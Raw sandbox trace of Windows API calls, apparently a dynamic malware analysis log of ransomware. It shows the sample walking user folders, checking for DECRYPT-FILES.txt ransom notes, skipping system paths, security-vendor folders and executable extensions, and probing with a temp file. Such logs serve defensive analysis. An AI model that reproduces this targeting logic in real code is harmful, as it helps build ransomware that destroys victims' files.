ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.717] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.717] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.717] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.717] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.717] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0dad500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dd3660, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.717] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.717] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.717] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.717] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.717] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.717] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.717] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0186.717] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.717] CloseHandle (hObject=0xffffffff) returned 0 [0186.717] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos\\", cAlternateFileName="")) returned 0 [0186.717] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0186.717] CloseHandle (hObject=0xffffffff) returned 0 [0186.717] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0186.717] lstrcmpW (lpString1="Default User", lpString2=".") returned 1 [0186.718] lstrcmpW (lpString1="Default User", lpString2="..") returned 1 [0186.718] lstrcatW (in: lpString1="Default User", lpString2="\\" | out: lpString1="Default User\\") returned="Default User\\" [0186.718] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Default User\\" | out: lpString1="C:\\Users\\Default User\\") returned="C:\\Users\\Default User\\" [0186.718] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="\\Program Files") returned 0x0 [0186.718] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch=":\\Windows") returned 0x0 [0186.718] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="\\Games\\") returned 0x0 [0186.718] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.718] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.718] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.718] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.718] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.718] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="\\All Users") returned 0x0 [0186.718] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.718] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.718] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.718] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="AhnLab") returned 0x0 [0186.718] StrStrW (lpFirst="C:\\Users\\Default User\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.718] lstrlenW (lpString="C:\\Users\\Default User\\") returned 22 [0186.718] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.718] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Users\\Default User\\\\0a16c9.tmp") returned 33 [0186.718] CreateFileW (lpFileName="C:\\Users\\Default User\\\\0a16c9.tmp" (normalized: "c:\\users\\default user\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.718] GetLastError () returned 0x5 [0186.718] lstrlenW (lpString="C:\\Users\\Default User\\") returned 22 [0186.718] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.718] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Users\\Default User\\\\DECRYPT-FILES.txt") returned 40 [0186.718] CreateFileW (lpFileName="C:\\Users\\Default User\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default user\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.719] lstrlenW (lpString="C:\\Users\\Default User\\") returned 22 [0186.719] lstrcatW (in: lpString1="C:\\Users\\Default User\\", lpString2="*" | out: lpString1="C:\\Users\\Default User\\*") returned="C:\\Users\\Default User\\*" [0186.719] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos\\", cAlternateFileName="苟眔酯館ͯ")) returned 0xffffffff [0186.719] CloseHandle (hObject=0xffffffff) returned 0 [0186.719] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.719] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.719] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.719] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.719] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.719] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0186.719] lstrcmpW (lpString1="Public", lpString2=".") returned 1 [0186.719] lstrcmpW (lpString1="Public", lpString2="..") returned 1 [0186.719] lstrcatW (in: lpString1="Public", lpString2="\\" | out: lpString1="Public\\") returned="Public\\" [0186.719] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Public\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0186.719] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="\\Program Files") returned 0x0 [0186.719] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch=":\\Windows") returned 0x0 [0186.719] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="\\Games\\") returned 0x0 [0186.719] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.719] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.719] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.719] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.719] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.719] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="\\All Users") returned 0x0 [0186.719] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.719] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.719] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.719] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="AhnLab") returned 0x0 [0186.719] StrStrW (lpFirst="C:\\Users\\Public\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.719] lstrlenW (lpString="C:\\Users\\Public\\") returned 16 [0186.719] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.719] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\\\0a16c9.tmp") returned 27 [0186.719] CreateFileW (lpFileName="C:\\Users\\Public\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x24c [0186.721] lstrlenW (lpString="C:\\Users\\Public\\") returned 16 [0186.721] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.721] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\\\DECRYPT-FILES.txt") returned 34 [0186.721] CreateFileW (lpFileName="C:\\Users\\Public\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.721] lstrlenW (lpString="C:\\Users\\Public\\") returned 16 [0186.721] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\*") returned="C:\\Users\\Public\\*" [0186.721] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf1ff77c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1ff77c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0186.721] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.721] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf1ff77c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1ff77c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.721] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.721] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.721] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ff77c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1ff77c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1ff77c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.721] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.721] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.721] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.721] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.721] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.721] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.721] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.721] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.721] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.721] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.722] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.722] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.722] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.722] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.722] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.722] lstrlenW (lpString="C:\\Users\\Public\\") returned 16 [0186.722] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.722] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Users\\Public\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0186.722] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\Public\\0a16c9.tmp") returned="C:\\Users\\Public\\0a16c9.tmp" [0186.722] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.722] CreateFileW (lpFileName="C:\\Users\\Public\\0a16c9.tmp" (normalized: "c:\\users\\public\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.722] CloseHandle (hObject=0x0) returned 0 [0186.722] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.722] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0f76580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.722] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.722] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0186.722] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0186.722] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0186.722] lstrcatW (in: lpString1="Desktop", lpString2="\\" | out: lpString1="Desktop\\") returned="Desktop\\" [0186.722] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Desktop\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0186.723] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="\\Program Files") returned 0x0 [0186.723] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch=":\\Windows") returned 0x0 [0186.723] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="\\Games\\") returned 0x0 [0186.723] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.723] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.723] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.723] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.723] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.723] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="\\All Users") returned 0x0 [0186.723] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.723] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.723] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.723] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="AhnLab") returned 0x0 [0186.723] StrStrW (lpFirst="C:\\Users\\Public\\Desktop\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.723] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\") returned 24 [0186.723] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.723] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Desktop\\\\0a16c9.tmp") returned 35 [0186.723] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\desktop\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.723] GetLastError () returned 0x5 [0186.723] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\") returned 24 [0186.723] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.723] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Desktop\\\\DECRYPT-FILES.txt") returned 42 [0186.723] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\desktop\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.723] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\") returned 24 [0186.723] lstrcatW (in: lpString1="C:\\Users\\Public\\Desktop\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Desktop\\*") returned="C:\\Users\\Public\\Desktop\\*" [0186.723] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.724] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.724] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.724] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.724] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.724] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0186.724] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0186.724] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="autorun.inf") returned -1 [0186.724] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="boot.ini") returned -1 [0186.724] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="desktop.ini") returned -1 [0186.724] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="ntuser.dat") returned -1 [0186.724] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="iconcache.db") returned -1 [0186.724] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="bootsect.bak") returned -1 [0186.724] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="ntuser.dat.log") returned -1 [0186.724] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="thumbs.db") returned -1 [0186.724] lstrcmpiW (lpString1="Adobe Reader X.lnk", lpString2="Bootfont.bin") returned -1 [0186.724] lstrlenW (lpString="Adobe Reader X.lnk") returned 18 [0186.724] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0186.724] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0f76580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.724] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.724] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.724] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.724] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.724] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.724] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.724] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df21ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7df21ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7df21ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0186.724] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0186.724] 